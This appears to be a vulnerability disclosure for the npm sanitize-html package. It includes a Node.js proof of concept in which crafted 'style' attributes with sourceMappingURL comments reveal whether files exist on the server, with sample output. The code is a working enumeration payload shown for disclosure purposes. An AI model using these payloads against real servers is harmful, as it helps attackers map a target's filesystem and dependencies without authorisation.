The sanitize-html package, when used on the backend and with the "style" attribute allowed, allows enumeration of files in the system (including project dependencies).
npm i sanitize-html
node index.js
// index.js
const sanitizeHtml = require('sanitize-html');
const file_exist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");'>@slonser_</a>`;
const file_notexist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */");'>@slonser_</a>`;
const file_exist_clean = sanitizeHtml(file_exist, {
allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
})
const file_notexist_clean = sanitizeHtml(file_notexist, {
allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
})
console.log(file_exist_clean, "// valid file path on backend")
console.log(file_notexist_clean, "// invalid file path on backend")
Output:
<a>@slonser_</a> // valid file path on backend
<a style="background-image:url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */")">@slonser_</a> // invalid file path on backend
When a file actually exists on the server (and is not a valid source map), we won't receive the "style" attribute. Otherwise, we will receive it.
Vsevolod Kokorin (Slonser) of Solidlab